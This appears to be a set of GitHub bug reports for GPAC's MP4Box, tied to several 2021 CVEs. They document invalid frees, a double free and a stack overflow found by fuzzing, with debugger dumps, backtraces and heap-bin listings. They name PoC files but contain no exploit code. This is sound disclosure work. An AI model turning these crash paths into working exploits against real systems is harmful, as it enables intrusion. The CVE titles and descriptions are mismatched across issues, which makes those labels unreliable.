    *R12  0x7fffffff7190 ◂— 0x0
    *R13  0x10
    *R14  0x7ffff7ffb000 ◂— 0x6565726600001000
    *R15  0x1
    *RBP  0x7fffffff7270 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0
    *RSP  0x7fffffff6f20 ◂— 0x0
    *RIP  0x7ffff758218b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
    ───────────────────────────────────────[ DISASM ]────────────────────────────────────────
     ► 0x7ffff758218b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
       0x7ffff7582193 <raise+211>    xor    rax, qword ptr fs:[0x28]
       0x7ffff758219c <raise+220>    jne    raise+260                <raise+260>
        ↓
       0x7ffff75821c4 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>
    
       0x7ffff75821c9                nop    dword ptr [rax]
       0x7ffff75821d0 <killpg>       endbr64
       0x7ffff75821d4 <killpg+4>     test   edi, edi
       0x7ffff75821d6 <killpg+6>     js     killpg+16                <killpg+16>
    
       0x7ffff75821d8 <killpg+8>     neg    edi
       0x7ffff75821da <killpg+10>    jmp    kill                <kill>
    
       0x7ffff75821df <killpg+15>    nop
    ────────────────────────────────────────[ STACK ]────────────────────────────────────────
    00:0000│ rsi r9 rsp 0x7fffffff6f20 ◂— 0x0
    01:0008│            0x7fffffff6f28 —▸ 0x7ffff77534c8 ◂— 0xe001200003748 /* 'H7' */
    02:0010│            0x7fffffff6f30 —▸ 0x7fffffff72f0 —▸ 0x5555555d47a0 —▸ 0x5555555d4370 ◂— 0x0
    03:0018│            0x7fffffff6f38 —▸ 0x7ffff7fe7c2e ◂— mov    r11, rax
    04:0020│            0x7fffffff6f40 ◂— 0x0
    05:0028│            0x7fffffff6f48 ◂— 0x0
    06:0030│            0x7fffffff6f50 —▸ 0x5555555df390 —▸ 0x5555555df3f0 —▸ 0x5555555df0f0 ◂— 0x0
    07:0038│            0x7fffffff6f58 ◂— 0x0
    ──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────
     ► f 0   0x7ffff758218b raise+203
       f 1   0x7ffff7561859 abort+299
       f 2   0x7ffff75cc3ee __libc_message+670
       f 3   0x7ffff75d447c
       f 4   0x7ffff75d5cac _int_free+748
       f 5   0x7ffff784f461 gf_sg_command_del+353
       f 6   0x7ffff7a88203 gf_sm_del+195
       f 7   0x555555584423 dump_isom_scene+627

CVE-2021-45262: Invalid free in gf_sg_command_del() · Issue #1980 · gpac/gpac

An invalid free vulnerability exists in gpac 1.1.0 via the gf_svg_delete_attribute_value function, which causes a segmentation fault and application crash.

CVE-2021-45263: Invalid free in gf_svg_delete_attribute_value() · Issue #1975 · gpac/gpac

An Invalid pointer reference vulnerability exists in gpac 1.1.0 via the gf_svg_node_del function, which causes a segmentation fault and application crash.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

An Invalid free was discovered in gf\_svg\_node\_del(). The vulnerability causes a segmentation fault and application crash.

**Version:**

    MP4Box - GPAC version 1.1.0-DEV-rev1555-g339e7a736-master
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --prefix=/root/fuck_bin/gpac/test
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**command:**

gf\_svg\_node\_del-gf\_node\_unregister.zip

**Result**

    ┌─[root@aidai-virtual-machine] - [~/fuck_bin/gpac/results/fuckbt2] - [二 12月 14, 10:45]
    └─[$] <> ../../test/lib/MP4Box -bt lsr_read_anim_values_ex.part-lsr_read_animateTransform/id:000439,sig:11,src:004575+004803,op:splice,rep:2
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 853091
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 853091
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 LASeR Scene Parsing
    [LASeR] memory overread - corrupted decoding
    [1]    3777658 segmentation fault  ../../test/lib/MP4Box -bt
    ┌─[root@aidai-virtual-machine] - [~/fuck_bin/gpac/results/fuckbt2] - [二 12月 14, 10:45]
    └─[$] <> /root/fuck_bin/gpac/test/lib/MP4Box -bt gf_svg_node_del-gf_node_unregister/id:000409,sig:11,src:004547,op:havoc,rep:8
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 853069
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 853069
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 LASeR Scene Parsing
    [LASeR] samerect coded in bitstream but no rect defined !
    double free or corruption (out)
    [1]    3786815 abort      /root/fuck_bin/gpac/test/lib/MP4Box -bt
    

**gdb**

    Program received signal SIGABRT, Aborted.
    __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x0
     RBX  0x7ffff72bf040 ◂— 0x7ffff72bf040
     RCX  0x7ffff758218b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
     RDX  0x0
     RDI  0x2
     RSI  0x7fffffff6a30 ◂— 0x0
     R8   0x0
     R9   0x7fffffff6a30 ◂— 0x0
     R10  0x8
     R11  0x246
     R12  0x7fffffff6ca0 ◂— 0x0
     R13  0x10
     R14  0x7ffff7ffb000 ◂— 0x62756f6400001000
     R15  0x1
     RBP  0x7fffffff6d80 —▸ 0x7ffff7727b80 (main_arena) ◂— 0x0
     RSP  0x7fffffff6a30 ◂— 0x0
     RIP  0x7ffff758218b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
     ► 0x7ffff758218b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
       0x7ffff7582193 <raise+211>    xor    rax, qword ptr fs:[0x28]
       0x7ffff758219c <raise+220>    jne    raise+260                <raise+260>
        ↓
       0x7ffff75821c4 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>
    
       0x7ffff75821c9                nop    dword ptr [rax]
       0x7ffff75821d0 <killpg>       endbr64
       0x7ffff75821d4 <killpg+4>     test   edi, edi
       0x7ffff75821d6 <killpg+6>     js     killpg+16                <killpg+16>
    
       0x7ffff75821d8 <killpg+8>     neg    edi
       0x7ffff75821da <killpg+10>    jmp    kill                <kill>
    
       0x7ffff75821df <killpg+15>    nop
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsi r9 rsp 0x7fffffff6a30 ◂— 0x0
    01:0008│            0x7fffffff6a38 —▸ 0x7ffff7fe7c2e ◂— mov    r11, rax
    02:0010│            0x7fffffff6a40 ◂— 0x2
    03:0018│            0x7fffffff6a48 —▸ 0x5555555e06e0 —▸ 0x5555555e0698 ◂— 0x0
    04:0020│            0x7fffffff6a50 ◂— 0x18
    05:0028│            0x7fffffff6a58 —▸ 0x5555555e06f0 —▸ 0x5555555e2758 ◂— 0x0
    06:0030│            0x7fffffff6a60 —▸ 0x5555555e37b0 —▸ 0x5555555e37d0 ◂— 0x8000000300000426
    07:0038│            0x7fffffff6a68 —▸ 0x5555555e06f0 —▸ 0x5555555e2758 ◂— 0x0
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff758218b raise+203
       f 1   0x7ffff7561859 abort+299
       f 2   0x7ffff75cc3ee __libc_message+670
       f 3   0x7ffff75d447c
       f 4   0x7ffff75d6120 _int_free+1888
       f 5   0x7ffff7b51c85 lsr_read_id+629
       f 6   0x7ffff7b5e91b lsr_read_path+283
       f 7   0x7ffff7b61822 lsr_read_update_content_model+770
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff7561859 in __GI_abort () at abort.c:79
    #2  0x00007ffff75cc3ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff76f6285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155
    #3  0x00007ffff75d447c in malloc_printerr (str=str@entry=0x7ffff76f8670 "double free or corruption (out)") at malloc.c:5347
    #4  0x00007ffff75d6120 in _int_free (av=0x7ffff7727b80 <main_arena>, p=0x5555555e06e0, have_lock=<optimized out>) at malloc.c:4314
    #5  0x00007ffff7b51c85 in lsr_read_id () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #6  0x00007ffff7b5e91b in lsr_read_path () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #7  0x00007ffff7b61822 in lsr_read_update_content_model () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #8  0x00007ffff7b59fc3 in lsr_read_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #9  0x00007ffff7b5ab74 in lsr_decode_laser_unit () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #10 0x00007ffff7b6239d in gf_laser_decode_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #11 0x00007ffff7aa3061 in gf_sm_load_run_isom () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #12 0x00005555555844a8 in dump_isom_scene ()
    #13 0x000055555557b42c in mp4boxMain ()
    #14 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1d8) at ../csu/libc-start.c:308
    #15 0x000055555556c45e in _start ()
    

    Breakpoint 4, __GI___libc_free (mem=0x5555555e06f0) at malloc.c:3087
    3087    in malloc.c
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX  0x5555555e37b0 —▸ 0x5555555e37d0 ◂— 0x8000000300000426
     RBX  0x5555555dc120 —▸ 0x5555555d1a00 ◂— 0x0
    *RCX  0x27
    *RDX  0xa
    *RDI  0x5555555e06f0 —▸ 0x5555555e2758 ◂— 0x0
    *RSI  0xfffffff7
     R8   0x1999999999999999
     R9   0x0
     R10  0x7ffff76daac0 (_nl_C_LC_CTYPE_toupper+512) ◂— 0x100000000
     R11  0x7ffff76db3c0 (_nl_C_LC_CTYPE_class+256) ◂— 0x2000200020002
     R12  0x1
    *R13  0x3
     R14  0x0
    *R15  0x7fffffff6a50 ◂— 0x18
     RBP  0x0
     RSP  0x7fffffff6e18 —▸ 0x7ffff7b51c85 (lsr_read_id+629) ◂— mov    qword ptr [r15 + 8], 0
     RIP  0x7ffff75d9850 (free) ◂— endbr64
    ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff75d9850 <free>       endbr64
       0x7ffff75d9854 <free+4>     sub    rsp, 0x18
       0x7ffff75d9858 <free+8>     mov    rax, qword ptr [rip + 0x14d699]
       0x7ffff75d985f <free+15>    mov    rax, qword ptr [rax]
       0x7ffff75d9862 <free+18>    test   rax, rax
       0x7ffff75d9865 <free+21>    jne    free+152                <free+152>
    
       0x7ffff75d986b <free+27>    test   rdi, rdi
       0x7ffff75d986e <free+30>    je     free+144                <free+144>
    
       0x7ffff75d9870 <free+32>    mov    rax, qword ptr [rdi - 8]
       0x7ffff75d9874 <free+36>    lea    rsi, [rdi - 0x10]
       0x7ffff75d9878 <free+40>    test   al, 2
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────00:0000│ rsp 0x7fffffff6e18 —▸ 0x7ffff7b51c85 (lsr_read_id+629) ◂— mov    qword ptr [r15 + 8], 0
    01:0008│     0x7fffffff6e20 —▸ 0x5555555e37b0 —▸ 0x5555555e37d0 ◂— 0x8000000300000426
    02:0010│     0x7fffffff6e28 ◂— 0x426
    03:0018│     0x7fffffff6e30 —▸ 0x5555555e37b0 —▸ 0x5555555e37d0 ◂— 0x8000000300000426
    04:0020│     0x7fffffff6e38 —▸ 0x7ffff784a61e (gf_node_setup+30) ◂— mov    qword ptr [rbx], rax
    05:0028│     0x7fffffff6e40 ◂— 0x426
    ... ↓        2 skipped
    ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0   0x7ffff75d9850 free
       f 1   0x7ffff7b51c85 lsr_read_id+629
       f 2   0x7ffff7b5e91b lsr_read_path+283
       f 3   0x7ffff7b61822 lsr_read_update_content_model+770
       f 4   0x7ffff7b59fc3 lsr_read_command_list+6819
       f 5   0x7ffff7b5ab74 lsr_decode_laser_unit+708
       f 6   0x7ffff7b6239d gf_laser_decode_command_list+333
       f 7   0x7ffff7aa3061 gf_sm_load_run_isom+1505
    ──────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> bin
    tcachebins
    0x20 [  1]: 0x5555555e1690 ◂— 0x0
    0x50 [  1]: 0x5555555e2ad0 ◂— 0x0
    0xb0 [  1]: 0x5555555dc540 ◂— 0x0
    0xc0 [  4]: 0x5555555d1d20 —▸ 0x5555555d2060 —▸ 0x5555555d2270 —▸ 0x5555555dc3c0 ◂— 0x0
    0x140 [  1]: 0x5555555d1b80 ◂— 0x0
    0x1c0 [  1]: 0x5555555d17a0 ◂— 0x0
    0x210 [  1]: 0x5555555dd8b0 ◂— 0x0
    0x410 [  1]: 0x5555555cee30 ◂— 0x0
    fastbins
    0x20: 0x0
    0x30: 0x0
    0x40: 0x0
    0x50: 0x0
    0x60: 0x0
    0x70: 0x0
    0x80: 0x0
    unsortedbin
    all: 0x0
    smallbins
    empty
    largebins
    empty
    pwndbg> c
    Continuing.
    double free or corruption (out)
    pwndbg> x/10gx 0x5555555e06f0-0x20
    0x5555555e06d0: 0x0000000000000000      0x0000000000000061
    0x5555555e06e0: 0x00005555555e0698      0x00007fffffff6a50
    0x5555555e06f0: 0x00005555555e2758      0x00005555555e2758
    0x5555555e0700: 0x0000000000000000      0x0000000000000000
    0x5555555e0710: 0x0000000000000000      0x0000000000000000

CVE-2021-45259: Invalid free in gf_svg_node_del() · Issue #1986 · gpac/gpac

A stack overflow vulnerability exists in gpac 1.1.0 via the gf_bifs_dec_proto_list function, which causes a segmentation fault and application crash.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

A stack overflow was discovered in gf\_bifs\_dec\_proto\_list(). The vulnerability causes a segmentation fault and application crash.

**Version:**

    MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration:
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**command:**

poc\_8.zip

**Result**

    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type stbk in parent minf
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Track with no sample table !
    [iso file] Track with no sample description box !
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 832544
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type stbk in parent minf
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Track with no sample table !
    [iso file] Track with no sample description box !
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 832544
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 BIFS Scene Parsing
    *** stack smashing detected ***: terminated
    [1]    3737450 abort      ./MP4Box -lsr ./poc/poc_8
    

**gdb**

    *** stack smashing detected ***: terminated
    
    Program received signal SIGABRT, Aborted.
    __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x0
    *RBX  0x7ffff72bf040 ◂— 0x7ffff72bf040
    *RCX  0x7ffff758218b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
     RDX  0x0
    *RDI  0x2
    *RSI  0x7fffffff68a0 ◂— 0x0
    *R8   0x0
    *R9   0x7fffffff68a0 ◂— 0x0
    *R10  0x8
    *R11  0x246
    *R12  0x7fffffff6b20 ◂— 0x0
    *R13  0x20
    *R14  0x7ffff7ffb000 ◂— 0x202a2a2a00001000
    *R15  0x1
    *RBP  0x7fffffff6c20 —▸ 0x7ffff76f607c ◂— '*** %s ***: terminated\n'
    *RSP  0x7fffffff68a0 ◂— 0x0
    *RIP  0x7ffff758218b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
     ► 0x7ffff758218b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
       0x7ffff7582193 <raise+211>    xor    rax, qword ptr fs:[0x28]
       0x7ffff758219c <raise+220>    jne    raise+260                <raise+260>
        ↓
       0x7ffff75821c4 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>
    
       0x7ffff75821c9                nop    dword ptr [rax]
       0x7ffff75821d0 <killpg>       endbr64
       0x7ffff75821d4 <killpg+4>     test   edi, edi
       0x7ffff75821d6 <killpg+6>     js     killpg+16                <killpg+16>
    
       0x7ffff75821d8 <killpg+8>     neg    edi
       0x7ffff75821da <killpg+10>    jmp    kill                <kill>
    
       0x7ffff75821df <killpg+15>    nop
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsi r9 rsp 0x7fffffff68a0 ◂— 0x0
    01:0008│            0x7fffffff68a8 —▸ 0x7ffff7546278 ◂— 0x10001200005bb2
    02:0010│            0x7fffffff68b0 —▸ 0x7fffffff6c40 —▸ 0x5555555df3b0 ◂— 0x6b6
    03:0018│            0x7fffffff68b8 —▸ 0x7ffff7fe7c2e ◂— mov    r11, rax
    04:0020│            0x7fffffff68c0 ◂— 0xcd2709f17adf5bb6
    05:0028│            0x7fffffff68c8 ◂— 0x0
    06:0030│            0x7fffffff68d0 ◂— 0x7
    07:0038│            0x7fffffff68d8 ◂— 0x1
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff758218b raise+203
       f 1   0x7ffff7561859 abort+299
       f 2   0x7ffff75cc3ee __libc_message+670
       f 3   0x7ffff766eb4a __fortify_fail+42
       f 4   0x7ffff766eb16
       f 5   0x7ffff79064bc gf_bifs_dec_proto_list+2012
       f 6 0xb6b6b6b6b6b6b6b6
       f 7 0xb6b6b6b6b6b6b6b6
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff7561859 in __GI_abort () at abort.c:79
    #2  0x00007ffff75cc3ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff76f607c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155
    #3  0x00007ffff766eb4a in __GI___fortify_fail (msg=msg@entry=0x7ffff76f6064 "stack smashing detected") at fortify_fail.c:26
    #4  0x00007ffff766eb16 in __stack_chk_fail () at stack_chk_fail.c:24
    #5  0x00007ffff79064bc in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #6  0xb6b6b6b6b6b6b6b6 in ?? ()
    #7  0xb6b6b6b6b6b6b6b6 in ?? ()
    #8  0xb6b6b6b6b6b6b6b6 in ?? ()
    #9  0xb6b6b6b6b6b6b6b6 in ?? ()
    #10 0xb6b6b6b6b6b6b6b6 in ?? ()
    #11 0xb6b6b6b6b6b6b6b6 in ?? ()
    #12 0xb6b6b6b6b6b6b6b6 in ?? ()
    #13 0xb6b6b6b6b6b6b6b6 in ?? ()
    #14 0xb6b6b6b6b6b6b6b6 in ?? ()
    #15 0xb6b6b6b6b6b6b6b6 in ?? ()
    #16 0xb6b6b6b6b6b6b6b6 in ?? ()
    #17 0xb6b6b6b6b6b6b6b6 in ?? ()
    #18 0xb6b6b6b6b6b6b6b6 in ?? ()
    #19 0xb6b6b6b6b6b6b6b6 in ?? ()
    #20 0xb6b6b6b6b6b6b6b6 in ?? ()
    #21 0xb6b6b6b6b6b6b6b6 in ?? ()
    #22 0xb6b6b6b6b6b6b6b6 in ?? ()
    #23 0xb6b6b6b6b6b6b6b6 in ?? ()
    #24 0xb6b6b6b6b6b6b6b6 in ?? ()
    #25 0xb6b6b6b6b6b6b6b6 in ?? ()
    #26 0xb6b6b6b6b6b6b6b6 in ?? ()
    #27 0xb6b6b6b6b6b6b6b6 in ?? ()
    #28 0xb6b6b6b6b6b6b6b6 in ?? ()
    #29 0xb6b6b6b6b6b6b6b6 in ?? ()
    #30 0xb6b6b6b6b6b6b6b6 in ?? ()
    #31 0xb6b6b6b6b6b6b6b6 in ?? ()
    #32 0xb6b6b6b6b6b6b6b6 in ?? ()
    #33 0xb6b6b6b6b6b6b6b6 in ?? ()
    #34 0xb6b6b6b6b6b6b6b6 in ?? ()
    #35 0xb6b6b6b6b6b6b6b6 in ?? ()
    #36 0xb6b6b6b6b6b6b6b6 in ?? ()
    #37 0xb6b6b6b6b6b6b6b6 in ?? ()
    #38 0xb6b6b6b6b6b6b6b6 in ?? ()
    #39 0xb6b6b6b6b6b6b6b6 in ?? ()
    #40 0xb6b6b6b6b6b6b6b6 in ?? ()
    #41 0xb6b6b6b6b6b6b6b6 in ?? ()
    #42 0xb6b6b6b6b6b6b6b6 in ?? ()
    #43 0xb6b6b6b6b6b6b6b6 in ?? ()
    #44 0xb6b6b6b6b6b6b6b6 in ?? ()
    #45 0xb6b6b6b6b6b6b6b6 in ?? ()
    #46 0xb6b6b6b6b6b6b6b6 in ?? ()
    #47 0xb6b6b6b6b6b6b6b6 in ?? ()
    #48 0xb6b6b6b6b6b6b6b6 in ?? ()
    #49 0xb6b6b6b6b6b6b6b6 in ?? ()
    #50 0xb6b6b6b6b6b6b6b6 in ?? ()
    #51 0xb6b6b6b6b6b6b6b6 in ?? ()
    #52 0xb6b6b6b6b6b6b6b6 in ?? ()
    #53 0xb6b6b6b6b6b6b6b6 in ?? ()
    #54 0xb6b6b6b6b6b6b6b6 in ?? ()
    #55 0xb6b6b6b6b6b6b6b6 in ?? ()
    #56 0xb6b6b6b6b6b6b6b6 in ?? ()
    #57 0xb6b6b6b6b6b6b6b6 in ?? ()
    #58 0xb6b6b6b6b6b6b6b6 in ?? ()
    #59 0xb6b6b6b6b6b6b6b6 in ?? ()
    #60 0xb6b6b6b6b6b6b6b6 in ?? ()
    #61 0xb6b6b6b6b6b6b6b6 in ?? ()
    #62 0xb6b6b6b6b6b6b6b6 in ?? ()
    #63 0xb6b6b6b6b6b6b6b6 in ?? ()
    #64 0xb6b6b6b6b6b6b6b6 in ?? ()
    #65 0xb6b6b6b6b6b6b6b6 in ?? ()
    #66 0xb6b6b6b6b6b6b6b6 in ?? ()
    #67 0xb6b6b6b6b6b6b6b6 in ?? ()
    #68 0xb6b6b6b6b6b6b6b6 in ?? ()
    #69 0xb6b6b6b6b6b6b6b6 in ?? ()
    #70 0xb6b6b6b6b6b6b6b6 in ?? ()
    #71 0xb6b6b6b6b6b6b6b6 in ?? ()
    #72 0xb6b6b6b6b6b6b6b6 in ?? ()
    #73 0xb6b6b6b6b6b6b6b6 in ?? ()
    #74 0xb6b6b6b6b6b6b6b6 in ?? ()
    #75 0xb6b6b6b6b6b6b6b6 in ?? ()
    #76 0xb6b6b6b6b6b6b6b6 in ?? ()
    #77 0xb6b6b6b6b6b6b6b6 in ?? ()
    #78 0xb6b6b6b6b6b6b6b6 in ?? ()
    #79 0xb6b6b6b6b6b6b6b6 in ?? ()
    #80 0xb6b6b6b6b6b6b6b6 in ?? ()
    #81 0xb6b6b6b6b6b6b6b6 in ?? ()
    #82 0xb6b6b6b6b6b6b6b6 in ?? ()
    #83 0xb6b6b6b6b6b6b6b6 in ?? ()
    #84 0xb6b6b6b6b6b6b6b6 in ?? ()
    #85 0xb6b6b6b6b6b6b6b6 in ?? ()
    #86 0xb6b6b6b6b6b6b6b6 in ?? ()
    #87 0xb6b6b6b6b6b6b6b6 in ?? ()
    #88 0xb6b6b6b6b6b6b6b6 in ?? ()
    #89 0xb6b6b6b6b6b6b6b6 in ?? ()
    #90 0xb6b6b6b6b6b6b6b6 in ?? ()
    #91 0xb6b6b6b6b6b6b6b6 in ?? ()
    #92 0xb6b6b6b6b6b6b6b6 in ?? ()
    #93 0xb6b6b6b6b6b6b6b6 in ?? ()
    #94 0xb6b6b6b6b6b6b6b6 in ?? ()
    #95 0xb6b6b6b6b6b6b6b6 in ?? ()
    #96 0xb6b6b6b6b6b6b6b6 in ?? ()
    #97 0xb6b6b6b6b6b6b6b6 in ?? ()
    #98 0x000080b6b6b6b6b6 in ?? ()
    #99 0x0000000000000002 in ?? ()
    #100 0x0000000000000044 in ?? ()
    #101 0x0000000000000008 in ?? ()
    #102 0x00005555555c7e60 in ?? ()
    #103 0x00005555555cf500 in ?? ()
    #104 0x0000000000000000 in ?? ()
    

`break gf_bifs_dec_proto_list`

    Breakpoint 1, 0x00007ffff7905ce0 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ──────────────────────────────────[ REGISTERS ]───────────────────────────────────
     RAX  0x1
     RBX  0x5555555d23b0 ◂— 0x0
     RCX  0x710
     RDX  0x5555555df2f0 ◂— 0x0
     RDI  0x5555555de660 ◂— 0x0
     RSI  0x5555555d23b0 ◂— 0x0
     R8   0x0
     R9   0x0
     R10  0x7ffff775bc80 ◂— 'gf_sg_command_new'
     R11  0x7ffff7727be0 (main_arena+96) —▸ 0x5555555df320 ◂— 0x0
     R12  0x5555555df2f0 ◂— 0x0
     R13  0x5555555df1d0 ◂— 0x0
     R14  0x5555555d42a0 ◂— 0x0
     R15  0x0
     RBP  0x5555555de660 ◂— 0x0
     RSP  0x7fffffff7168 —▸ 0x7ffff7906559 (BD_DecSceneReplace+73) ◂— mov    r12d, eax
     RIP  0x7ffff7905ce0 (gf_bifs_dec_proto_list) ◂— endbr64
    ────────────────────────────────────[ DISASM ]────────────────────────────────────
     ► 0x7ffff7905ce0 <gf_bifs_dec_proto_list>       endbr64
       0x7ffff7905ce4 <gf_bifs_dec_proto_list+4>     push   r15
       0x7ffff7905ce6 <gf_bifs_dec_proto_list+6>     push   r14
       0x7ffff7905ce8 <gf_bifs_dec_proto_list+8>     push   r13
       0x7ffff7905cea <gf_bifs_dec_proto_list+10>    mov    r13, rsi
       0x7ffff7905ced <gf_bifs_dec_proto_list+13>    mov    esi, 1
       0x7ffff7905cf2 <gf_bifs_dec_proto_list+18>    push   r12
       0x7ffff7905cf4 <gf_bifs_dec_proto_list+20>    push   rbp
       0x7ffff7905cf5 <gf_bifs_dec_proto_list+21>    push   rbx
       0x7ffff7905cf6 <gf_bifs_dec_proto_list+22>    sub    rsp, 0x488
       0x7ffff7905cfd <gf_bifs_dec_proto_list+29>    mov    rax, qword ptr [rdi + 0x50]
    ────────────────────────────────────[ STACK ]─────────────────────────────────────
    00:0000│ rsp 0x7fffffff7168 —▸ 0x7ffff7906559 (BD_DecSceneReplace+73) ◂— mov    r12d, eax
    01:0008│     0x7fffffff7170 —▸ 0x5555555de660 ◂— 0x0
